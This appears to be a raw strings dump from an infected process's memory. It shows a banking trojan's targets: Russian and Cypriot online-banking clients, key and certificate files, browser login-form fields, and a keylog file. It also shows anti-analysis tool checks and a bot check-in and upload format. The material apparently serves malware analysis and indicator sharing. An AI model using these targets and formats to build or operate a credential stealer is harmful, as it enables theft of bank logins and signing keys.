Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

LOCALSERVICE!WINUK0FFOO83I6!427963A6

MSCTF.Shared.MAPPING.fffffffe

MSCTF.Shared.MAPPING.ffffffff

MSCTF.Shared.MAPPING.fffffffd

MSCTF.Shared.MUTEX.fffffffe

MSCTF.Shared.MUTEX.ffffffff

C:\Windows\apppatch\xodaql.exe

C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

svchost.exe_824_rwx_006B0000_00056000:

.text

`.data

.reloc

`.rdata

@.data

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

svchost.exe_824_rwx_00ED0000_00065000:

.text

`.rdata

@.data

.reloc

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

SYSTEM!WINUK0FFOO83I6!427963A6

MSCTF.Shared.MAPPING.fffffffe

MSCTF.Shared.MAPPING.ffffffff

MSCTF.Shared.MAPPING.fffffffd

MSCTF.Shared.MUTEX.fffffffe

MSCTF.Shared.MUTEX.ffffffff

C:\Windows\apppatch\xodaql.exe

C:\Windows\system32\config\systemprofile\AppData\Roaming\

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

svchost.exe_864_rwx_01A40000_00056000:

.text

`.data

.reloc

`.rdata

@.data

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

svchost.exe_864_rwx_026F0000_00065000:

.text

`.rdata

@.data

.reloc

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

